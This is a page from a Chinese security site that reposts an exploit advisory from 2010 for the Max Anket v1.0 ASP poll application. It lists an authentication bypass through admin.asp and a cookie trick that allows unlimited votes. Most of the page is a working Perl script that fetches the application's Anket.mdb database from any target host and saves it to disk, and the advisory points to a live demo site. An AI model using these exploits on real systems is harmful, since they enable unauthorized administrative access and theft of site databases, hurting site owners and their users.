首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Max Anket v1.0 - Multiple Remote Vulnerabilities
来源:knockoutr@msn.com 作者:knockoutr@msn.com 发布时间:2010-10-12  
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[+] Greatz : Inj3ct0r Team & DaiMon & BARCOD3
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Max Anket v1.0
~Software: http://www.aspdunyasi.com/goster.asp?id=8
~Vulnerability Style : Auth Bypass, Database Disclosure, unlimited votes Vulnerabilities
[~]Date : "11.10.2010"
-----------
~Demo:  http://www.hellamarine.com/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ~~~~~~~~ Explotation [Auth Bypass]~~~~~~~~~~~
    http://VICTIM/admin.asp
    ~~~~~~~~ Explotation [Unlimited votes]~~~~~~~~~~~
    Votes navigation, and "Kullandi = [YourPCNAME]" delete cookie.
    ~~~~~~~~ Explotation [Disclosure Exploit]~~~~~~~~~~~
    use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('title Max Anket v1.0 Database Disclosure Exploit');
system('color 4');


if(@ARGV < 2)
{
print "[-]Ornegi inceleyin\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}

print "\n************************************************************************\n";
print "\* Max Anket v1.0 Database Disclosure Exploit              *\n";
print "\* Exploited By : KnocKout                                                  *\n";
print "\* Contact:   knockoutr[at]msn[dot]com                                 *\n";
print "\* --                                     *\n";
print "\*********************************************************************\n\n\n";

($TargetIP, $path, $File,) = @ARGV;

$File="Anket.mdb";
my $url = "http://" . $TargetIP . $path . $File;
print "\n wait!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "C:/db.mdb");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to C:/db.mdb\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Postcard Mentor - Database Dis
·sakkis digital postcards 1.0 b
·AdaptCMS 2.0.1 Beta Release Re
·nutscards (ing) Database Discl
·Disk Pulse Server v2.2.34 Remo
·my postcard (ing) Database Dis
·Acoustica BeatCraft v1.02 Buil
·mirabilis e-kart (tr) Database
·Oracle Java 6 OBJECT tag "laun
·erolife e-kart sistemi (tr) Da
·Firefox 3.5.10 & 3.6.6 WMP Mem
·corvus e-kart scripti v0-5 (tr
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved